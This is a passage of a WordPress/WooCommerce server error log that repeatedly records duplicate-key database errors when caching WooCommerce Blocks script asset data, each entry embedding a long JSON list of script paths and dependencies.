wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.713647 2026] [lsapi:warn] [pid 823496:tid 823724] [client 45.13.225.123:33164] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.715043 2026] [lsapi:warn] [pid 823496:tid 823724] [client 45.13.225.123:33164] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.733140 2026] [lsapi:warn] [pid 817651:tid 817906] [client 45.13.225.123:33168] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.734595 2026] [lsapi:warn] [pid 817651:tid 817906] [client 45.13.225.123:33168] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.743246 2026] [lsapi:warn] [pid 817651:tid 817876] [client 45.13.225.123:33246] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.744735 2026] [lsapi:warn] [pid 817651:tid 817876] [client 45.13.225.123:33246] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-regist